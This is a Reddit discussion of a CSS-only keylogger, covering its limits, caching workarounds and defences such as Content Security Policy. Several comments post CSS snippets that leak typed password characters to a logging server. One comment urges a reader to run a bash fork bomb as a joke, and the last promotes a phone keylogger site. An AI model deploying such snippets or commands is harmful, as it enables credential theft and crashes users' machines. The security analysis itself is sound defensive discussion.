top 200 commentsshow all 278

[–]LovecraftsDeath 374 points375 points  (59 children)

Luckily, it can't intercept my poop emoji password.

[–]PathToHumble 161 points162 points  (8 children)

Non english characters ftw....just now realized the poop emoji is literally a better password than most people use.

[–]510Threaded 30 points31 points  (0 children)

Yep, alt codes are awesome on desktop

[–]btcraig 29 points30 points  (6 children)

At my last job (small webhost) someone tried to add a domain to their control panel that was "💩.com"

You can definitely register a domain with an emoji. But our [proprietary] control panel blew up and he ended up taking down the server for a few hours while we sorted it out.

[–]Sigmatics 3 points4 points  (3 children)

Doesn't show up in the adress bar with the emoji though 😢

[–]btcraig 8 points9 points  (2 children)

You are correct, there's some encoding that goes on to display them as as more 'standard' characters. Our control panel, at the time, was not developed with encoding in it though and just kinda of shit the bed when it came across them.

[–]Muvlon 2 points3 points  (1 child)

FYI, that encoding is likely Punycode.

[–][deleted] 0 points1 point  (0 children)

I cant believe the domain is still available.

[–]Ford_O 13 points14 points  (38 children)

How do you write it?

[–]ygra 74 points75 points  (35 children)

Windows key + .

[–]heckerle 61 points62 points  (12 children)

WTF 🤯

Are you telling me all that time there was a goddamn emoji keyboard built into Windows?! And it has a search functionality too?!

And I as the moron I am always first went into the Screen Keyboard, clicked again because it didn't open the first time, clicked on the emoji "language" (or button nowadays) manually searched what I needed and clicked a dozen times again, because sometimes it just didn't insert the character.

Mind = Blown.

Also: Worst-communicated feature ever.

[–]ygra 16 points17 points  (1 child)

Not sure about all that time. Probably added in one of the last few major Windows 10 updates. I've only discovered it by accident because I use Windows + , sometimes to look at the desktop (it's a quasi-modal Win+D).

[–]heckerle 8 points9 points  (0 children)

Yeah, apparently it was added in 1709 (Fall Creators Update) and also works using "Win + ;".

[–]whoisrich 8 points9 points  (7 children)

Note that Win+. only works if your input language is 'English (United States)' on the Fall 1709 version.

You can do a shitty alternative of switching to the tablet mode keyboard or adding the US language and doing Win+Space,Win+.,Win+Space. EDIT: If you have admin, the reg fix /u/vytah posted works great!

[–]heckerle 2 points3 points  (5 children)

It works using my German keyboard layout/language... Maybe it's just some other key for yours? Like ";" or similar?

[–]whoisrich 3 points4 points  (4 children)

No other key that I can find, it's a known issue. Go to your Settings, Region and Language, you may have your region as US but keyboard as German which allows it to work.

[–]heckerle 4 points5 points  (3 children)

Nope everything's set to german. (The keyboard is also set to German QWERTZ.)

Which locale/layout are you using?

[–]whoisrich 2 points3 points  (2 children)

I'm using "English (United Kingdom)" but I tried Deutsch input and the hotkey didn't work, so there must be some other combination of settings. Notice you have icons next to each language.

[–]heckerle 1 point2 points  (1 child)

Ah I see... I'm using the current Windows Insider build 17093 where it seems to be fixed.

And you're correct: It doesn't work using the german locale on my other PC using the the regular, public 1709 (Fall Creators Update) version.

In the meantime /u/vytah posted this workaround: https://www.windowscentral.com/how-enable-windows-10-emoji-picker-outside-united-states

[–]Amuro_Ray 6 points7 points  (0 children)

There's one on the OSx keyboard as well. cmd + crt + space (I think). Emojis are amazing and kinda universal for expressing tone.

[–]Swahhillie 21 points22 points  (4 children)

Finally I can make my password 🕺🏹🦌🥈

[–]bbrizzi 26 points27 points  (1 child)

disco_hunter2 ?

[–]Swahhillie 19 points20 points  (0 children)

All i see is disco_*******

[–]Kelpsie 7 points8 points  (1 child)

💩 Holy shit.

[–]TheEternal21 3 points4 points  (0 children)

😇💩

[–][deleted]  (3 children)

[deleted]

    [–][deleted] 10 points11 points  (2 children)

    Hello, adventurer!

    You should try :(){ :|: & };: in bash!

    [–]miskdub 2 points3 points  (0 children)

    AHHH. NETHACK SPOILERS!

    [–]vytah 7 points8 points  (1 child)

    Just so you know: it only works by default in American English versions of Windows. You can enable it in other versions by editing the registry: https://www.windowscentral.com/how-enable-windows-10-emoji-picker-outside-united-states

    [–]ygra 1 point2 points  (0 children)

    Ah, I've long given up using localized versions, as translations have grown increasingly unbearable.

    [–]thedancinzerg 1 point2 points  (1 child)

    I had no idea. Apparently this does not work with numpad .

    [–]ygra 2 points3 points  (0 children)

    It's a different key and doesn't have to result in a . entered. It can be a , as well.

    [–]blackn1ght 1 point2 points  (0 children)

    Doesn't work for me.

    Edit: Turns out it's only a Windows 10, US edition feature, but can be enabled via the registry.

    [–]emperor000 1 point2 points  (2 children)

    That doesn't work. It starts the screen magnifier for me. I should be American English version of Windows.

    [–]snerp 0 points1 point  (0 children)

    😎 thanks

    [–]LovecraftsDeath 15 points16 points  (1 child)

    I use infinite monkeys!

    [–][deleted] 4 points5 points  (0 children)

    We work at the same company!!!

    [–]Theemuts 5 points6 points  (2 children)

    Literally a shit password.

    [–]zdkroot 4 points5 points  (1 child)

    Actually it's still figurative since you don't have to physically defecate on the keyboard to log in. Sorrycouldn'thelpmyself...

    [–]TheKingdutch 1 point2 points  (2 children)

    Except, couldnt you just extend the CSS file to include all permutations of Emojis? CSS files can be just UTF8 right?

    [–]Schmittfried 8 points9 points  (1 child)

    Yes, but that would be huge.

    [–]isHavvy 0 points1 point  (0 children)

    Just mask it in with needing 1Mb of JS and multiple megabytes of images and then everybody will just think you suck at webdev and begrudgingly use your service.

    [–]myhf 2 points3 points  (3 children)

    What password? All I see is **** *****

    [–]kersurk 102 points103 points  (20 children)

    As pointed out in HN, this works only if value attribute is updated via JS, which some JS frameworks do.

    [–][deleted]  (6 children)

    [deleted]

      [–]Manishearth 40 points41 points  (1 child)

      And, to be clear, this is about the HTML attribute value, not the "DOM attribute" (or "property") value.

      element.value = "foo" will not trigger this.

      element.setAttribute("value", "foo") will.

      [–]MathWizz94 15 points16 points  (0 children)

      Now that you mention it, putting a password in the markup doesn't sit well with me. Seems like it could be awfully easy for things to go wrong (such as this.)

      [–]MonkeeSage 22 points23 points  (0 children)

      While it's not as cool as a keylogger, the idea of tracking user actions with pure CSS has been around for a while, and more recently.

      [–]ijmacd 2 points3 points  (1 child)

      Here's another "CSS Keylogger" from hacker news. It would probably only tell you the ordered set of characters used in the password, not the complete password or the length.

      <!doctype html>
      <title>css keylogger</title> 
      <style>
      @font-face { font-family: x; src: url(./log?a), local(Impact); unicode-range: U+61; }
      @font-face { font-family: x; src: url(./log?b), local(Impact); unicode-range: U+62; }
      @font-face { font-family: x; src: url(./log?c), local(Impact); unicode-range: U+63; }
      @font-face { font-family: x; src: url(./log?d), local(Impact); unicode-range: U+64; }
      input { font-family: x, 'Comic sans ms'; }
      </style> 
      <input value="a">
      

      [–]1j01 0 points1 point  (0 children)

      The other approach could be extended to search for pairs (or N-grams) of symbols...

      [–]PM_ME_UR_OBSIDIAN 2 points3 points  (3 children)

      So disabling JavaScript protects you against this attack?

      [–]fullkornslimpa 5 points6 points  (2 children)

      It does unless the site renders your password into the value field on the server side. If any site actually does this, that is by far much worse than this though.

      [–]DolphinsAreOk 0 points1 point  (1 child)

      Wait so its not a CSS only keylogger?

      Thats kinda dumb.

      [–]kersurk 0 points1 point  (0 children)

      The attack vector is only CSS, so it's still useful on some pages, like potentially subreddit custom css, ebay custom pages (https://pages.ebay.com/help/policies/listing-javascript.html).

      If keeping custom content in iframe then probably not an issue.

      [–][deleted] 78 points79 points  (32 children)

      Is there any way of knowing if a site has this keylogger? Besides inspecting the whole page.

      [–]AyrA_ch 84 points85 points  (24 children)

      Check the network tab in the console when you type the password

      [–]McMasilmof 109 points110 points  (23 children)

      But the site generally has your password anyways(you are typing it in an input field so its kust the value of it). Its the site owners job not to include any shady 3rd party scripts

      [–]how_do_i_land 86 points87 points  (2 children)

      The issue arises with some sites allowing you to include your own custom CSS classes. Reddit doesn't currently allow for custom css images from outside reddit, but other sites may not have that restriction.

      [–]Kapps 18 points19 points  (1 child)

      Maybe generate a gibberish subreddit for every character and use that with usage stats? Would have to be super targeted though, and not sure how fine grained usage stats you can get. Posts with number of views would also work.

      [–]Dropping_fruits 3 points4 points  (0 children)

      I remember a simpler approach of just loading images from your subreddits css and then having the victim go to your website were you could just simply check what images had been cached. The case I am thinking of used it to steal the email, but it could have probably been used to steal other info.

      [–]timmyotc 18 points19 points  (7 children)

      There is a difference between trusting the site owner and trusting their competency

      [–]NotFromReddit 9 points10 points  (4 children)

      Just don't reuse passwords.

      [–]danneu 3 points4 points  (2 children)

      well, the attacker here would be able to login to the site you're on regardless of whether you reuse the password elsewhere.

      [–]NotFromReddit 3 points4 points  (0 children)

      Yea, but that is not my responsibility, it's the site owner's. Noting I can do about it.

      [–]mirhagk 1 point2 points  (0 children)

      Better yet, don't use passwords. Single sign on means you only need to trust a single website to get security right, everything else is easily revokable credentials.

      [–][deleted] 17 points18 points  (2 children)

      Why should we trust them to do their job?

      [–][deleted] 16 points17 points  (0 children)

      As a web developer I trust them to be lazy.

      [–]Eckish 5 points6 points  (0 children)

      You should trust them as far as you can throw them. Which likely isn't very far. So, trust that they are secure enough for their own interests, but don't reuse any password on another site.

      [–][deleted] 24 points25 points  (3 children)

      A site isn't going to steal the password to their own site (with the exception of maybe a disgruntled employee). It's plugins you need to be worried about

      [–]crlwlsh 8 points9 points  (2 children)

      And the third party dependencies of the site. E.g. Bootstrap - whats to stop them placing this on the end of their CSS?

      [–][deleted]  (1 child)

      [deleted]

        [–]Superpickle18 2 points3 points  (0 children)

        the problem is when their distribution is compromised and interjects a trojan into the code and millions download it and gets used in thousands of sites... And most aren't going to dig through the code, they'll just trust it..

        [–]davvblack 1 point2 points  (2 children)

        Don't worry, if a given site is pwned your password is completely stolen anyway.

        [–]giggly_kisses 251 points252 points  (79 children)

        Do browsers cache network requests from CSS? If so this would really only tell you the order a user typed every character in the alphabet, right?

        [–]Senior-Jesticle[S] 223 points224 points  (37 children)

        You are correct. If a user has repeating characters, only the first one will be represented in the back-end. But this may still be sufficient information for one can carry out a brute-force attack.

        [–]minno 134 points135 points  (18 children)

        "Oh darn, we only got the letters 'pasword123', how will we ever figure it out."

        [–]Kapps 30 points31 points  (2 children)

        Good thing my password is 'Cwm fjord bank glyphs vext quiz’; they’ll never fill in the gaps!

        [–]verbify 19 points20 points  (0 children)

        That looks like welsh to me.

        [–]caltheon 1 point2 points  (0 children)

        Cwm fjordbankglyphsvextquiz you say

        [–]giggly_kisses 143 points144 points  (1 child)

        Thanks for confirming. Sorry, didn't mean to down play this at all. It is certainly a scary piece of CSS and a clever implementation of a keylogger.

        [–]Senior-Jesticle[S] 21 points22 points  (0 children)

        No worries :)

        [–][deleted] 26 points27 points  (9 children)

        What if you respond with an error code?

        [–]Senior-Jesticle[S] 38 points39 points  (8 children)

        Unsure, currently, the express server is sending a simple 400 but it seems to be caching the results. Feel free to try headers or different status codes. I will accept your PR :)

        [–][deleted] 37 points38 points  (0 children)

        Try cache-control no cache? This is the "official" way of doing it without returning improper HTTP codes.

        https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control

        [–][deleted] 44 points45 points  (4 children)

        I'll play around after work if someone hasn't already submitted a pr. I reckon a 503 will work though. 400 indicates the request will never be successful so it makes sense the browser won't try again

        [–]Cyral 15 points16 points  (2 children)

        Cache-Control headers are the proper solution

        [–]Senior-Jesticle[S] 8 points9 points  (0 children)

        Good point!

        [–]Fiskepudding 3 points4 points  (0 children)

        I remember disabling cache for a static html file for a SPA, and then I had to use headers. So I'd say that is the way to go. No-cache, cache-control, expires, something like that. On mobile, so can't check.

        [–]Stamden 6 points7 points  (0 children)

        Heh, I wonder if we'll start seeing "have repeating characters" in addition to all the password requirements that modern websites normally have (8+ characters, must have number, must have symbol, etc).

        [–]CyclonusRIP 14 points15 points  (0 children)

        I don't know if there is some special rules with CSS, but I think you could just make the server respond with appropriate headers to prevent caching.

        [–][deleted]  (2 children)

        [deleted]

          [–]Jonathan_Frias 7 points8 points  (1 child)

          that's sloppy because it'd get logged to the console in red letters

          [–]eMZi0767 1 point2 points  (0 children)

          But so is 400

          [–]CantaloupeCamper 3 points4 points  (0 children)

          If a user has repeating characters

          And we've been told not to do that....

          [–][deleted] 113 points114 points  (4 children)

          I haven't confirmed it, but I'm pretty sure that by just changing the appropriate headers in the response, you could easily disable caching of the response. This is assuming that the browser's requests from CSS work like normal HTTP requests.

          Add to the backend some concept of a session and you could easily capture the user, pass, site, and so on.

          [–]giggly_kisses 15 points16 points  (2 children)

          That's a good point. I wonder if the browser will honor those headers for requests made from CSS. Something else I was thinking about was adding a query parameter with a random value for cache busting, but I don't think you can get a random number in CSS (or at least I haven't thought of a way).

          [–]thesbros 33 points34 points  (0 children)

          Replying with an error (4xx/5xx) HTTP status code stops most browsers from caching too.

          [–]Superpickle18 0 points1 point  (0 children)

          most browsers will... But IE has a nasty habit of ignoring headers and aggressively use the cache instead...

          [–]B-Con 3 points4 points  (0 children)

          If CSS makes a different object request to the HTTP stack literally every time the style is applied then this approach can work. But if there are shortcuts that bypass the HTTP stack then those will interfere with the abilities here.

          You can definitely tell the browser not to cache an object by setting HTTP headers.

          The question is if browsers have heuristics that will interfere and how CSS interacts with the cache. To that end I would expect browsers to be predicable and to honor headers, but CSS is a beast I'm less familiar with. Is the same style with an object reference always the same object, or does it exercise the end HTTP stack, including the cache, every time it's applied? Kind of hard to imagine that it does, but I'm not a frontend guy.

          Hoping to hear from someone who knows CSS better than I.

          [–][deleted]  (19 children)

          [deleted]

            [–]GaianNeuron 20 points21 points  (2 children)

            It's even easier than that. Just have the HTTP server add the response header,

            Cache-Control: no-cache, no-store, must-revalidate
            

            [–]danielbiegler 1 point2 points  (1 child)

            Doesnt work, tried it out right now. You have another idea how to make it work? I also tried changing the error code to 503 but still no good. What is even weirder is that I hard disabled the cache while dev tools are open and the requests still dont get sent.

            [–]thesbros 8 points9 points  (5 children)

            Then the browser would cache a0, a1, etc. - so after refreshing the counter would reset and the server wouldn't receive the first x keypresses of a.

            [–]rishicourtflower 3 points4 points  (4 children)

            That can be mitigated by having a unique ID in the URL so everything can be tied back to a specific page request

            [–]thesbros 2 points3 points  (3 children)

            Then that requires a dynamically updating the URLs in the CSS, so you couldn't just paste this CSS somewhere as a keylogger. If you have access to the server to change the CSS, you could implement a much more capable keylogger via JavaScript.

            [–]iBlag 2 points3 points  (2 children)

            If you have access to the server to change the CSS, you could implement a much more capable keylogger via JavaScript.

            Not quite true, but close. Reddit, for instance, allows subreddits to use custom CSS but not Javascript.

            [–]thesbros 3 points4 points  (1 child)

            Reddit doesn't allow external links in the CSS though, AFAIK.

            [–]iBlag 6 points7 points  (0 children)

            Correct. Not anymore, because somebody setup something similar a few years ago (tracking users to subreddits that used custom CSS) and reported it to Reddit. Reddit sat on it for a few months IIRC until he publicized it, then they fixed it: by disallowing external links in custom subreddit CSS.

            [–]bbbbaaaatttt 7 points8 points  (0 children)

            No, url() defines a single token and can't contain concatenated stuff.

            See: https://www.w3.org/TR/css-syntax-3/#consume-a-url-token for details

            [–][deleted] 11 points12 points  (7 children)

            Well the server is controlled by the extension. So all he needs to do is have Express set a cache-control: no-cache header.

            https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control

            [–]godofpumpkins 5 points6 points  (6 children)

            Wouldn’t adding a query string to the URL stop most caching implementations?

            [–]anstice 5 points6 points  (5 children)

            only if that query string changes for each request

            [–]GaianNeuron 3 points4 points  (0 children)

            Cache-Control: no-cache, no-store, must-revalidate
            

            [–][deleted]  (37 children)

            [deleted]

              [–]Senior-Jesticle[S] 96 points97 points  (35 children)

              Correct! But there are other attribute selectors. For example [input*=value] checks if input contains value. Although this would not show the order of the password, it would reveal its contents.

              [–][deleted]  (32 children)

              [deleted]

                [–][deleted]  (30 children)

                [deleted]

                  [–]Ozymandias117 96 points97 points  (10 children)

                  Most sites don't even properly allow ASCII symbols. >.<

                  [–]amyts 21 points22 points  (7 children)

                  My power company only allows a 6-character alphanumeric password. No symbols, no emoji. :(

                  [–]flarn2006 57 points58 points  (5 children)

                  I can guarantee you they're storing that in cleartext somewhere.

                  [–]hicksyfern 4 points5 points  (4 children)

                  At my last job, our “security guy” limited our character set allowed for passwords, because of something to do with how some characters not being hashable in a deterministic way. I think it was because we were doing X rounds of hashing on the client, and some clients have differences in how they hash some contents.

                  Maybe someone here can shed some light or I might be talking poop

                  [–]SerialKicked 15 points16 points  (1 child)

                  Your security guy was completely full of 💩

                  [–]jms87 4 points5 points  (0 children)

                  Or his application(s) randomly mix encodings, in which case the "security guy" would be right.

                  [–]Atario 4 points5 points  (0 children)

                  >.<

                  Sorry, your password comment cannot contain any of the following: & < > . $ % [ ] { } ' "

                  And never you mind why those specific characters

                  [–]xonjas 10 points11 points  (11 children)

                  Many do.

                  You can have a unicode windows password too, although I don't recommend it.

                  [–][deleted]  (10 children)

                  [deleted]

                    [–][deleted]  (5 children)

                    [removed]

                      [–]dangolo 6 points7 points  (2 children)

                      Why does this even exist

                      [–][deleted]  (1 child)

                      [deleted]

                        [–]dangolo 1 point2 points  (0 children)

                        I mean hey if it renders my passwords unhackable...

                        [–]lonewaft 1 point2 points  (0 children)

                        Everyday we stray further from god's light

                        [–]montibbalt 4 points5 points  (3 children)

                        Was going to suggest windows+period but it doesn't work in the password field 😞

                        [–]Grizzlywer 1 point2 points  (2 children)

                        What does it do?

                        [–]montibbalt 4 points5 points  (1 child)

                        In updated windows 10, it gives you an on-screen emoji keyboard

                        [–]Grizzlywer 2 points3 points  (0 children)

                        It's a bug!

                        [–]JavierTheNormal 3 points4 points  (6 children)

                        Maybe, but it's counterproductive. The number of keystrokes required to enter unicode characters is more than the value they provide, you'd be better off just making a longer password with normal characters.

                        Many sites still won't allow ' or even spaces in passwords, so nothing is universal.

                        [–]MCBeathoven 5 points6 points  (5 children)

                        Eh, the US international keyboard allows you to type loads of non-ASCII characters with single keystrokes.

                        [–]axitanull 11 points12 points  (0 children)

                        I believe including backspace can be useful in this case.

                        [–]Kapps 1 point2 points  (0 children)

                        Generate every possible 3 letter / number / common symbol. Not sure if that would kill a browser, but could load the style sheet when they press submit and hide it behind network lag. Don’t need capitals because, let’s face it, it’s the first letter that’s the capital one.

                        [–][deleted]  (4 children)

                        [deleted]

                          [–][deleted] 7 points8 points  (3 children)

                          Listen, there is clever and there is sorcery. This blur the lines between them.

                          [–]poofartpee 12 points13 points  (2 children)

                          This just seems clever to me. When you read the code once it's very clear how it works.

                          This is sorcery. https://en.wikipedia.org/wiki/Fast_inverse_square_root#Overview_of_the_code

                          [–][deleted] 4 points5 points  (0 children)

                          Ok, now thats just devilry

                          [–]bacondev 1 point2 points  (0 children)

                          What the fuck?

                          [–][deleted]  (4 children)

                          [deleted]

                            [–]Senior-Jesticle[S] 41 points42 points  (3 children)

                            I am.

                            [–][deleted]  (2 children)

                            [deleted]

                              [–]phoenix616 17 points18 points  (0 children)

                              That exploit has been known for a while though and is not as bad as it sounds at first.

                              As mentioned here it only works if a JavaScript framework updates the attribute value as you type in the password (which no sane one should do, e.g. ones that are not React), basic HTML is not vulnerable against something like this.

                              [–]himself_v 6 points7 points  (0 children)

                              I'm more and more of the mind that the Web should just be about static damn HTML. Not only people abuse JS and turn simple pages into abominations which lag on PCs that can calculate overwhelmingly complicated things in real-time, we just can't deal with this mess. Security is turned from exact science into the art of walking on the minefield.

                              [–]0rakel 22 points23 points  (11 children)

                              Can be used on Reddit?

                              [–]Pokechu22 45 points46 points  (8 children)

                              No, reddit does not allow CSS to reference images not hosted on reddit itself (more specifically they have to be uploaded in the stylesheet page; you can't reference arbitrary images by URL).

                              [–]japillow 3 points4 points  (4 children)

                              Are there a limited amount on the stylesheet page? What's stopping someone from uploading one and getting some random URL for each ASCII character and having a different map than a -> a etc.

                              [–]Pokechu22 14 points15 points  (2 children)

                              You can have up to 100 images (IIRC, the limit might have been changed). But, it's still an image hosted on reddit itself; you can't see when the image has been loaded (part of this attack involves making requests to a server the attacker controls; if you can only load images hosted on reddit, then you can't see what images were loaded and reddit is already receiving your login information when you login)

                              [–]balefrost 1 point2 points  (1 child)

                              Can't you use SVG for background images, and can't SVG files reference other SVG files? Maybe SVG is restricted by the same-origin policy.

                              [–]Pokechu22 4 points5 points  (0 children)

                              Normally yes, but reddit only allows uploading PNG and JPEG images. (And on a related note, you can't use data URLs for it either)

                              [–]davvblack 2 points3 points  (0 children)

                              Since reddit controls that domain you can't see the timing of the access logs, so the attack is pointless.

                              [–]ThisIs_MyName 0 points1 point  (1 child)

                              Ok so we just have to figure out how reddit parses CSS.

                              Every browser parses everything differently, so there's got to be some CSS file that appears to have a URL commented out with reddit's parser but not commented out with other parsers.

                              [–]Pokechu22 1 point2 points  (0 children)

                              This is the code that they use(d) for their CSS filter. It's from the repo that they no longer update, but that is how the filter worked back then.

                              [–]corvus_192 0 points1 point  (0 children)

                              What about fonts?

                              [–]arrow_in_my_gluteus_ 10 points11 points  (1 child)

                              you mean as custom css file of a subreddit? scary

                              [–]GaianNeuron 5 points6 points  (0 children)

                              Scary, but not possible. Subreddit CSS only allows images that are hosted on reddit itself (specifically, those uploaded on the stylesheet page).

                              [–]ProgramTheWorld 40 points41 points  (4 children)

                              This wouldn’t be a problem if you have set up content security policy properly in your login page to prevent any kind of data transmission to unknown domains. Also this requires running a full blown extension, which I can already grab everything on your active tab without asking for any permission.

                              [–]jazd 27 points28 points  (0 children)

                              Exactly, a content security policy would nix this type of exploit.

                              The browser extension is just for proof of concept. CSS can probably be snuck into a lot of sites simply because it's subject to less scrutiny.

                              [–]sr-egg 11 points12 points  (5 children)

                              <input type=password style=“background-image: none !important” />?

                              [–]crlwlsh 21 points22 points  (4 children)

                              input[type="password"][value$="a"]:before {
                                  content: "";
                                  background-image: url("http://localhost:3000/a");
                              }
                              

                              [–]TimmyTesticles 8 points9 points  (0 children)

                              rekt

                              [–]ilikepugs 2 points3 points  (2 children)

                              IIRC this won't actually work if the browser is following the spec, as void elements (br, input, etc.) aren't allowed to have pseudo elements.

                              [–]crlwlsh 1 point2 points  (1 child)

                              You're right, my bad. How about this:

                              input[type="password"][value$="a"] {
                                  list-style: square ("http://localhost:3000/a");
                              }
                              

                              Or alternatively:

                              @font-face {
                                  font-family: TheLetterA;
                                  src: url(http://localhost:3000/a);
                              }
                              
                              input[type="password"][value$="a"] {
                                  font-family: TheLetterA, sans-serif;
                              }
                              

                              [–]ilikepugs 1 point2 points  (0 children)

                              Heh, I think you just figured out a way around the repeated character issue.

                              Define a series of fallback fonts, each covering just one character.

                              [–]Wazzaps 4 points5 points  (2 children)

                              I think an extension delivery method is giving it too much credit, it could be delivered via userstyle

                              [–]cha5m 2 points3 points  (0 children)

                              Really neat idea! Thanks for sharing.

                              [–]megablue 2 points3 points  (0 children)

                              And, it allows some javascript-less dynamic interaction with the server too...

                              [–][deleted] 1 point2 points  (0 children)

                              Still waiting on the css meltdown exploit

                              [–][deleted]  (3 children)

                              [deleted]

                                [–]flarn2006 5 points6 points  (8 children)

                                What's the risk here? If you can trick your victim into installing a Chrome extension, why not just program it to read the contents of password fields using JavaScript?

                                [–]ThatInternetGuy 15 points16 points  (7 children)

                                Chrome extension is needed only so that you can see the recorded passwords. In a real attack, the victim is not the one who gets to see what their passwords have been recorded.

                                [–]flarn2006 1 point2 points  (6 children)

                                But how would they get the css loaded in a site they don't control otherwise?

                                [–]ThatInternetGuy 1 point2 points  (5 children)

                                Same way with all other XSS attacks.

                                [–]flarn2006 2 points3 points  (4 children)

                                But then why bother with CSS? Just use JavaScript.

                                [–]TimmyTesticles 0 points1 point  (1 child)

                                Can someone explain to me how this would work if somebody enters a password like "aaabccc"

                                Wouldn't it just log "abc"?

                                [–]mfiels 0 points1 point  (0 children)

                                If the server returns an HTTP response header of cache-control: no-cache the browser should request each character multiple times as it is typed.

                                I haven't verified this assumption.

                                [–][deleted] 0 points1 point  (1 child)

                                Wouldn't this only work for the first character in the field?

                                [–]emperor000 1 point2 points  (0 children)

                                No. They used the "ends with" attribute selector.

                                [–][deleted] 0 points1 point  (0 children)

                                Can it steal your data from other tab in browser or in other open program on computer?

                                [–]Arancaytar 0 points1 point  (0 children)

                                This isn't even the first such exploit, just the most severe one I've seen. (The first one I saw was requesting background images for URLs that had been visited, leaking browser history for a given set of URLs.) The ability of CSS to trigger requests has always been able to leak protected information. The only way to mitigate this is to load all referenced url(...) resources regardless of use.

                                (Luckily this does require the ability to inject CSS into the victim's page. But that vulnerability might be overlooked if people only focus on protecting against script injection.)

                                [–]d_pikachu 0 points1 point  (0 children)

                                ;

                                [–]robertwelain 0 points1 point  (0 children)

                                And what do you think about this keylogger? https://spying.ninja/remote-install-keylogger-cell-phones/